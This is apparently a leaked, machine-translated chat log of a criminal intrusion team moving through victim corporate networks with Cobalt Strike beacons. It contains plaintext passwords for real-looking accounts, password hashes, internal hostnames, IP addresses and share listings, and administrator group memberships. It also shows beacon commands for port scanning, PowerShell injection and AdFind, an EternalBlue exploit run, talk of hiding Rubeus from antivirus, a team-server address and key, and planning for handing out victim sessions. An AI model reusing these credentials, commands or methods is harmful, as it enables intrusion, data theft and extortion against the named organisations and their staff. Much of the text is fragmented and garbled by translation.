polyrey\Grellety e86e6c5f19915009b3c65492416e1f62
polyrey\Blanchard 6e51b128879e247c4491c4ab182f2b9e
```
``CN=Admin_VCENTER`` - there is one dk and that's it, on going to the site here is this horror from 2003 in two domains, in ad comp only dk, no comps, no servers
there are subsnets - 445 gives out comps from the main domain
are these some planned / test domains? snapshots are made, exported to backup and deleted backups are stored on winserv)` Azerty02 `this one
02f1aac45c8eba915ba76df951e7ef04 Grelles2
``Azerty02 this one``
cc25135efc9f3a2b14fa789ced1728ce
### Eyes in a bunch ### I'm not @tl2, but I'll throw in #Chloe2019#@tl2, send me the hash ###
```
blanchp2 43711ca9520253e475fbd9a32b18317b
``Herbst2018sphere
```
fowlerh@wilsonart.com
R3f1nn3j2!
``````
admin pRe1Udlp!-symantec
``````
	 * Username : fowlerh@wilsonart.com
	 * Domain : outlook.office365.com
	 * Password : R3f1nn3j2!
``````
setg Proxies socks4:199.127.61.214:1488
``170.7.76.79esx
```
drpvw01.wilsonart.com
``another sphere
```
dcvcsa01.wilsonart.com
``````
>description: VMware vCenter 6.0 Server
>operatingSystem: Windows Server 2012 R2 Datacenter
>dNSHostName: dcwas79.Wilsonart.com

    Share name Type Used as Comment
    ----------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    D$ Disk Default share
    IPC$ IPC Remote IPC
 
>description: Veeam Backup Server
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: dcveeam01.Wilsonart.com

    Share name Type Used as Comment
    ----------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
 
>description: Symantec End Point Management Server
>operatingSystem: Windows Server 2012 Standard
>dNSHostName: DCWAS45.Wilsonart.com

    Share name Type Used as Comment
    ------------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    IPC$ IPC Remote IPC
    print$ Disk Printer Drivers
 
>description: PROD Symantec AntiVirus Management Server
>operatingSystem: Windows Server 2012 Standard
>dNSHostName: FLWAS03.Wilsonart.com

    net view \FLWAS03.Wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 170.7.20.198:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    170.7.20.198:53161
    170.7.20.198:49154
    170.7.20.198:49153
    170.7.20.198:9090
    170.7.20.198:8446
    170.7.20.198:8445
    170.7.20.198:8443
    170.7.20.198:8014
    170.7.20.198:8008
    170.7.20.198:8006
    170.7.20.198:5985
    170.7.20.198:5060
    170.7.20.198:3389
    170.7.20.198:2000
    170.7.20.198:1611
    170.7.20.198:1610
    170.7.20.198:1100
    170.7.20.198:143
    170.7.20.198:139
    170.7.20.198:135
    170.7.20.198:110
    170.7.20.198:80
    170.7.20.198:25
    170.7.20.198:21
 
 
 
 
 
>description: Vcenter Server
>dNSHostName: bod01-vce01.eu.wilsonart.com

    net view \bod01-vce01.eu.wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 10.40.60.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    10.40.60.70:9443
    10.40.60.70:9087
    10.40.60.70:9084
    10.40.60.70:8084
    10.40.60.70:8008
    10.40.60.70:7444
    10.40.60.70:5580
    10.40.60.70:5480
    10.40.60.70:5060
    10.40.60.70:2020
    10.40.60.70:2015
    10.40.60.70:2014
    10.40.60.70:2012
    10.40.60.70:2000
    10.40.60.70:1514
    10.40.60.70:636
    10.40.60.70:514
    10.40.60.70:443
    10.40.60.70:389
    10.40.60.70:110
    10.40.60.70:88
    10.40.60.70:80
    10.40.60.70:25
    10.40.60.70:21
 
>description: Veeam Backup Server
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: bod01-bkp01.eu.Wilsonart.com

    Share name Type Used as Comment
    ----------------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    D$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    R$ Disk Default share
    V$ Disk Default share
    veeam_agent_ISOs Disk
    W$ Disk Default share
    X$ Disk Default share
 
 
 
 
>dNSHostName: nas_signature.polyrey.net

    Share name Type Used as Comment
    ------------------------------------------------
    Archives_Outlook Disk
    Astier Disk
    CALDERA_RIPS Disk
    Depot Disk
    Design Library Disk
    INFO Disk
    IPC$ IPC IPC Service ()
    PROJETS_Signature Disk
    Signature_PAO Disk
    TEST_JFC Disk
    Users_Archives Disk Users_Archives

    172.25.168.64:6281
    172.25.168.64:5001
    172.25.168.64:5000
    172.25.168.64:548
    172.25.168.64:443
    172.25.168.64:139
    172.25.168.64:80
    172.25.168.64:445 (platform: 500 version: 6.1 name: NAS_SIGNATURE domain: POLYREY)
 
 
 
 
 
 
>description: virtuell auf VMware (Win 10)
>operatingSystem: Windows 10 Pro
>dNSHostName: VIPW7700.resopal.lan

    net view \VIPW7700.resopal.lan /all
    Systemfehler 53 aufgetreten.
    Der Netzwerkpfad wurde nicht gefunden.

    Antwort von 172.22.198.250: Zielhost nicht erreichbar.
    Ping-Statistik für 172.22.190.190:
    Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0
    (0% Verlust),

    172.22.198.250:541
    172.22.198.250:443
    172.22.198.250:22 (SSH-2.0-U_fcWc)
 
 
 
 
>operatingSystem: Windows 7 Professional
>dNSHostName: BBBACKUP.bushboard.co.uk

    Ping request could not find host BBBACKUP.bushboard.co.uk. Please check the name and try again.
 
>description: Backup Server
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/BBBK01.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: BBBK01.bushboard.co.uk

    Ping statistics for 2002:c001:147::c001:147:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
 
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/testmove.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: testmove.bushboard.co.uk

    Ping statistics for 2002:c001:15c::c001:15c:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
 
>operatingSystem: Windows Server 2016 Standard
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2012
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2016
>dNSHostName: BBDC03.bushboard.co.uk

    Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
    Bushboard Backups Disk
    C$ Disk Default share
    E$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    iTop-2.6.1-4463 Disk
    log Disk
    SQL_Server Disk
    U$ Disk Default share
    UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.  
    VBRCatalog Disk
    vCenterBackups Disk
    WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.                                           
    WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.                        
 
>operatingSystem: unknown
>dNSHostName: ltn01-vcenter01.bushboard.co.uk

    Ping statistics for 2002:c001:111::c001:111:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
 
 
 
 
>operatingSystem: Windows 10 Pro
>dNSHostName: NB-AsemBackup.technistone.local
>User: adm-cavailj - IP Address: 172.25.168.113
`User: petersm2 - IP Address: 170.7.76.192````
adm-cavailj adm-GrelleS Administrator
alexanm bmccm fowlerh
lucase moorer2 owensd
petersm2 polyreyadmin roeders
solarwindsarm.svc vyombmccm
``````
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
sysadmin
ZOHOCORP\raja-9298
The command completed successfully.



The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator pmpdemo rmp
The command completed successfully.



The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator adssp assetprober
desktopcentral gjprabu-0985 kamal-0150
nocfw sysadmin sysaudit
vijay-3486 zohoits
The command completed successfully.
``open as xls``
Resource Name User Account Password
anand1 acc1 test1_%#@
anand1 aa aa z$ZMGxCAewr8Z
Gun as p7<umNNq

``@user3
```
beacon> portscan 192.168.16.0/24 23,22,80,1433,135,445,3389,5900
[*] Tasked beacon to scan ports 23,22,80,1433,135,445,3389,5900 on 192.168.16.0/24
[+] host called home, sent: 74813 bytes
[+] received output:
Scanner module is complete

beacon> portscan 192.168.16.0/24
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 192.168.16.0/24
[+] host called home, sent: 74813 bytes
[+] received output:
Scanner module is complete
``exactly))`` double space bar try to remove the double space bar really started, although I'm sure it gave an error.... but ok
`execute-assembly /home/user/Desktop/TOOLS/1/Rubeus.exe monitor /interval:1` - does not want to work and gives help. is there anything you can do about it? hmm. now it weighs230 kilobytes it is heavier than 1M for fileless execution and why do you drop it?i need to run rubus and AV kills it as soon as i drop it in my mind yes, what's wrong with dll? @tl2 do we have a way to pack the exe file so it won't get killed by AV? `Win 7 Pro
```
svembu.localzoho.com [172.20.3.7]
zcpl-wine6420.localzoho.com [172.20.3.7]
rex-0179.localzoho.com [172.20.3.7]
oorni-3055.localzoho.com [172.20.3.7]
vijaya-dr1.localzoho.com [172.20.3.7]
srini-1728.localzoho.com [172.20.3.7]
zforms-w7-64-1.localzoho.com [172.20.3.7]
abrar--4885.localzoho.com [172.20.3.7]
mohammed-con127.localzoho.com [172.20.3.7]
mohan-2271-temp.localzoho.com [172.20.3.7]
integ-wiin7.localzoho.com [172.20.3.7]
sivanandam-2729.localzoho.com [172.20.3.7]
integ-win7-1-bc.localzoho.com [172.20.3.7]

integ-win7-1.csez.zohocorpin.com [192.168.113.57]
integ-win7-2.csez.zohocorpin.com [192.168.113.71]

tmrm-compliance.csez.zohocorpin.com [192.168.225.179]
``would need to specify domain sbmuser sbmdomain sbmpassprice... it's strange that it's vulnerable...but here you probably need a credentials...

[*] 192.168.113.242:445 - Target OS: Windows 10 Pro 10586
[-] 192.168.113.113.242:445 - Unable to find accessible named pipe!
[*] 192.168.113.113:242:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

``would ms17_010_command not use@tl2 any ideas?
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] 192.168.113.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.113.242:445 - Host is probably VULNERABLE to MS17-010! - Windows 10 Pro 10586 x64 (64-bit)
[*] 192.168.113.113:242:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.113.242:445 - Connecting to target for exploitation.
[+] 192.168.113.113:242:445 - Connection established for exploitation.
[+] 192.168.113.113:242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.113.113:242:445 - CORE raw buffer dump (20 bytes)
[*] 192.168.113.113.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 31 Windows 10 Pro 1
[*] 192.168.113.242:445 - 0x00000010 30 35 38 36 0586
[+] 192.168.113.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.113.113.242:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.113.113.242:445 - Sending all but last fragment of exploit packet
[-] 192.168.113.242:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
[*] Started bind TCP handler against 192.168.113.242:4444
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) >

````Win Serv 2008 R2`

```
win2k8adc.localzoho.com [172.20.3.7]
vcenter.localzoho.com [172.20.3.7]
print-server-bk.localzoho.com [172.20.3.7]
hpacc-control.localzoho.com [172.20.3.7]

printserver.csez.zohocorpin.com [192.168.100.206]
est-it-storage.csez.zohocorpin.com [192.168.100.74]
est-av-server.csez.zohocorpin.com [192.168.100.68]

finance-server.csez.zohocorpin.com [192.168.112.132]

integ-i18n.csez.zohocorpin.com [192.168.113.56]

tally-server.csez.zohocorpin.com [192.168.206.51]
``Well, there's one already.
then on 17-010 to scan vin2008 servers is still quite possible and the second one
```
beacon> shell ping INTEG-DRBD-XP64
[*] Tasked beacon to run: ping INTEG-DRBD-XP64
[+] host called home, sent: 51 bytes
[+] received output:

Pinging integ-drbd-xp64.csez.zohocorpin.com [192.168.113.49] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.113.49:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

``One.
```
beacon> shell ping INTEG-XP1
[*] Tasked beacon to run: ping INTEG-XP1
[+] host called home, sent: 45 bytes
[+] received output:

Pinging integ-xp1.csez.zohocorpin.com [192.168.113.58] with 32 bytes of data:
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62

Ping statistics for 192.168.113.58:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 8ms, Maximum = 8ms, Average = 8ms

``There's still no XP exploit working so why don't you try 17-010 ? XP Professional is and 2012 R2 is 2008 R2-AD has no 2003 / XP cars ? Just nothing else comes to mind but it's hardly a good idea ... big network, brute-force here....
maybe try a list of domain admins@tl1 Maybe brute-force the top passwords?
Minimum password length: 8
Length of password history maintained: 3
Lockout threshold: 15
Lockout duration (minutes): 15
``Describe progress to the workgroupswiden signed by @user8`LP-BC8DTT2 what was the pk name? or polzakwosupply.comdesire2learn.com user:jguerrero
bigassfans.com user:lmmoore which ones are dead? can i get into wsndomain.com? both networks are dead the rest are dead no i have 1 how many networks with YES? how many or how many of each? yes, mine is back
working with it check the input cobu i got 30 silencershop.com in the same groups the rest of you who are working write down progress who wrote down dead sessions in groups, wait 20 minutes write in groups that need to reopencreatecreated[ ](https://mediaeveryone.com/channel/general?msg=BTTw8up58goy7kT7E) go to the site - d2l.com[ ](https://mediaeveryone.com/channel/general?msg=TNJMxWoAgagW66y9j) yes
URL : https://wosupply.okta.com/
Username : bert.engeron@wosupply.com
Password : Summer2019
```
i think this is the real domaindesire2learn.com I just downloaded it, what is the real domain of the group?
@tl1ad_user_desireln.d2lvv taken+1 free see? I can't see it, I've already created a confu
>userPrincipalName: *davidw@dvdempire.lan
>objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=dvdempire,DC=lan
>dSCorePropagationData: 16010101000000.0Z
>lastLogonTimestamp: 132467236873201585
>textEncodedORAddress: X400:C=us;A= ;P=DVD Empire;O=Exchange;S=Walter;G=David;I=M;
*>mail: davidw@dvdempire.com
````dvdempire.lan ``dvdempire.com````
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@sugarinstant.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@tlagay.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@popporn.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@digiflixxx.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempiredistributing.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@pornstarempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@ravanallc.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirestore.net
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dekkoo.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempirefilms.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirestores.co
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempirecash.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@whackoffer.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@useddvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@blackholeboards.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bedroomadvisor.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bargainadultdvd.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@strangespin.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bluedoor.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@rentals.goodvibes.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@vivid.dvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@spicetvstore.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@arraydisplays.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@it.dvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirebase.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@sixflavors.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@uencode.net
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@uencode.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@total2257.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@2257.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bluecastvod.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@redgalaxy.com
>proxyAddresses: SMTP:GFIME_MOVEEXCH_USER@adultdvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@gaydvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@useddvd.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@stripclubdatabase.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@pornstardata.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dvdempire.lan
>proxyAddress
What is the real one? At the end of the fucking dvdempire.lanmbh mobile user and works through wifiColleagues, I'm writing a note to the general channel!
In the process of mstsc.exe I have not worked shell with the following error:
```
[-] Could not connect to pipe: 2
```
The right solution to this error was Inject to another process, namely rundll32.exe
Now I use the command line without knowing what to do! ðrnvpna\Not finding PO mzt+ there is one more available@user7 your back `BEngeron@192.168.0.19 (LP-BC8DTT2)`ifconf did not show anything, now check cf@user1 your back Checking for signs of vpn? who died could come back Check input codeNo connection On the second `LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.
`Nothing comes up net domain and AD find doesn't strat why? Mm-hmm>mail: KMartin@snpartners.com
>proxyAddresses: SMTP:KMartin@snpartners.comАД not removed probably snpartners.com what are the names of the fields? look - there are lots of emails on domains in users
https://www.snpartners.com/
https://www.martinsullivan.com/
https://www.snpartners.com/
they all have something to do with john deereOne FMP.local2 came@user3 take it away there +1 session new where did you download the ad users? I downloaded there above - there names as autogenerated take the ad users and watch it then sure not av lab121 mb file for ad users - even in the terminal all do not fit into the terminal what about ad?
172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)
172.31.190.11:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)

[+] received output:
172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN)
172.31.190.16:445 (platform: 500 version: 6.3 name: JDOFIEECONN01 domain: JDOSSN)
172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN)

[+] received output:
172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN)
172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
``20 minPovislaThere are 10 in progress+do all groups have this address in their mail? I think so.
E-mail: briancarroll@directmail.com
``This isn't porn://www.bigassfans.com/повершелом by the user either```
    Name : Private Dashboard | Big Ass Fans
    URL : https://bigassfans.myabsorb.com/#/dashboard
``Real domain and I'm creating a confab, hell info I didn't ask for it. Why? @user9.local doesn't count @user3 the main domain is real and I'll create a chat room - Austin.SilencerShop.comWill you make groups not to litter here? @tl1thinks it's real@user9 browser still check it outAre there any trusts @user9?
seems normal, few machines and users 133/68```
Host Name: MMURPHY
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18362 N/A Build 18362
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: helpdesk
Registered Organization: N/A
Product ID: 00330-80136-38831-AA714
Original Install Date: 3/5/2020, 7:55:40 AM
System Boot Time: 10/15/2020, 3:13:39 PM
System Manufacturer: Microsoft Corporation
System Model: Surface Laptop 3
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 126 Stepping 5 GenuineIntel ~1198 Mhz
BIOS Version: Microsoft Corporation 7.124.140, 6/23/2020
Windows Directory: C:\windows
System Directory: C:{windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 7,782 MB
Available Physical Memory: 3,868 MB
Virtual Memory: Max Size: 8,998 MB
Virtual Memory: Available: 4,426 MB
Virtual Memory: In Use: 4,572 MB
Page File Location(s): C:\pagefile.sys
Domain: DMGROUP
Logon Server:              \CYMA17
Hotfix(s): 9 Hotfix(s) Installed.
                           [01]: KB4578974
                           [02]: KB4497727
                           [03]: KB4521863
                           [04]: KB4561600
                           [05]: KB4576751
                           [06]: KB4576754
                           [07]: KB4577670
                           [08]: KB4580325
                           [09]: KB4577671
Network Card(s): 4 NIC(s) Installed.
                           [01]: Intel(R) Wi-Fi 6 AX201 160MHz
                                 Connection Name: Wi-Fi
                                 Status: Media disconnected
                           [02]: Bluetooth Device (Personal Area Network)
                                 Connection Name: Bluetooth Network Connection
                                 Status: Media disconnected
                           [03]: TAP-Windows Adapter V9
                                 Connection Name: Local Area Connection
                                 Status: Media disconnected
                           [04]: DisplayLink Network Adapter NCM
                                 Connection Name: Ethernet 3
                                 DHCP Enabled: Yes
                                 DHCP Server: 172.16.4.69
                                 IP address(es)
                                 [01]: 172.16.4.42
                                 [02]: fe80::59eb:2e4:28b8:70ee
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes

``Trend Mycrots have one more free session available and check out the users[ ](https://mediaeveryone.com/channel/general?msg=kNNDhmN3z5kdL2Bj8) ``
Host Name: W08872612198
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18362 N/A Build 18362
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: W08872612198
Registered Organization: N/A
Product ID: 00330-52406-72961-AAOEM
Original Install Date: 12/5/2019, 6:01:44 PM
System Boot Time: 9/23/2020, 12:22:08 AM
System Manufacturer: Dell Inc.
System Model: OptiPlex 5070
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~3000 Mhz
BIOS Version: Dell Inc. 1.2.1, 11/14/2019
Windows Directory: C:\Windows
System Directory: C:{Windows\system32
Boot Device:               \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 16.166 MB
Available Physical Memory: 8.825 MB
Virtual Memory: Max Size: 18,598 MB
Virtual Memory: Available: 8,859 MB
Virtual Memory: In Use: 9,739 MB
Page File Location(s): C:\pagefile.sys
Domain: jdossn.local
Logon Server:              \JDODC12
Hotfix(s): 14 Hotfix(s) Installed.
                           [01]: KB4552931
                           [02]: KB4497165
                           [03]: KB4497727
                           [04]: KB4515383
                           [05]: KB4516115
                           [06]: KB4524569
                           [07]: KB4528759
                           [08]: KB4537759
                           [09]: KB4560959
                           [10]: KB4561600
                           [11]: KB4565554
                           [12]: KB4569073
                           [13]: KB4576751
                           [14]: KB4574727
Network Card(s): 2 NIC(s) Installed.
                           [01]: Intel(R) Ethernet Connection (7) I219-V
                                 Connection Name: Ethernet
                                 DHCP Enabled: Yes
                                 DHCP Server: 172.31.190.17
                                 IP address(es)
                                 [01]: 10.51.128.172
                                 [02]: fe80::896f:a415:af2d:57b1
                           [02]: Intel(R) Wireless-AC 9560 160MHz
                                 Connection Name: Wi-Fi
                                 Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes

``What's the axis? Because without AV?
[+] Determining what EDR products are installed on localhost...
[+] No EDR products found! Operate at your own risk!
``````
beacon> psinject 13584 x86 Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt"
[*] Tasked beacon to psinject: Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt" into 13584 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
ERROR: FindAll : Exception calling "FindAll" with "0" argument(s): "The server is not operational.
ERROR: "
ERROR:
ERROR: At line:5253 char:52
ERROR: + else { $Results = $UserSearcher.FindAll <<<< () }
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DotNetMethodException
ERROR:
``The ad_users in the mail address will be the real domain, if it will be .local then most likely something is wrong, check processes first, browser, ad infochet names are strange...``
txbaybcraig txbaybcware TXBayCGarza
txbaycharki txbaycphill txbaydblake
txbayecooke TXBayFBanks TXBayGHebel
TXBayGLane txbayjwille TXBayKSchoe
txbaymkurz txbaymobile txbayoffice
TXBayParts txbayparts2 txbayrmedin
TXBayRSeide txbayrvince txbayrzenke
txbaysdtv txbaytech1 txbaytech10
txbaytech11 txbaytech12 txbaytech2
txbaytech3 txbaytech4 txbaytech5
txbaytech6 txbaytech7 txbaytech8
txbaytech9 TXBayTechn txbaytechn2
txbaytlucas TXBayTStein txbaywhouse
TXBea4PBeau txbeaablanc txbeabblack
txbeacsory txbeacthibo TXBeaDBertino
txbeadblanc TXBeaDLivin txbeadrive1
txbeajborda txbeajbowen txbeajlariv
txbeajleach TXBeaKHoffm txbeaklee
``try to take off through the shell didn't create through run just displayed a list of name+group
through the shell did not work with the same error is it an external domain? try to run adfind.exe directly without ``button
beacon> run AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 347720 bytes
[-] could not spawn AdFind.bat: 5
``within run?
beacon> shell AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 41 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C AdFind.bat: 5
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir: 5
``Not localreal domains plz''
usr2-2[LP-BC8DTT2]BEngeron/15956|2020Oct15 22:33:49> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
WOSupply.local
``Look at the aduser and tell me if it happens or not, but it seems to be a real session
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 231 bytes
[+] received output:
BigAssFan.local
``or reality? is it a trickBigAssFan.local on the classic - get the session, write the domain here, create a confab and then as usual for nothing good, thank youmaximum you will look for profiles for the team server do not think tomorrow will throw the guide, it is as understandable tomorrow will be no questions questions? tomorrow you and I will deal with cob settings and other things, with servers today will solve the problem plan following
```
104.194.11.160:41476
SISmByXnBD8YYmmWFNtumTJWsX8YQhO4O6VR
```
here come the sessions, separate the AV/Honey from the normal networks and work with them, the coba is clean, you can pass yourself from here or work in it, depends on the dirt your kobya already wrote about it so we were told to fuck up now, so less you fuck up later because you busy@user7 about the coba later it's familiar ?I'm not asking how you infect the victim, I'm asking how you crypt the cob and stuff like session distribution between the teams how do you prepare the cob ?well, here's how you get the sessions ? @tl2 and silence, thank you at least for such answers (ok, then how to configure ? setup - please if you do not know where to get servers I will not tell you @user8 already wrote to yourself think about it, so we first want an answer to this question, where and how can you tell us ? first thing: take servers where will? what, how and why do we need to know the procedure for getting sessions on the cob
1. how to prepare a cobu
2. what to do
3. how to do it correctly
4. the principles of work to explain everything we need to bring it to us this allcoba need an algorithm for obtaining a new coba for each day with new configs, gaskets, servers
clean after configurations? next after what? hmm. let's say, what next? or how to understand what I wrote? thank you all clear server registration, configuration of a web server with a domain and ssl which is sent to the server kobys hear hearPlease hear my cry from the soul !A to Z needs a complete scheme, not links to gita@tl1 @tl2 and about "spacers" in detail and the whole list of preparations setup cobo Explain in full the principle of getting cob@tl1 @tl2 Please take 10-15 minutes now, than to be distracted by our pings with stupid questions@tl1 @tl2
How do I make sure the cobs arrive without pestering you with this? after 10 da@tl1 @tl2what about today's nets?:smirk: you will be the last one in any case) tell me if there are mistakes, otherwise it will not work and I will be the last one to blame!
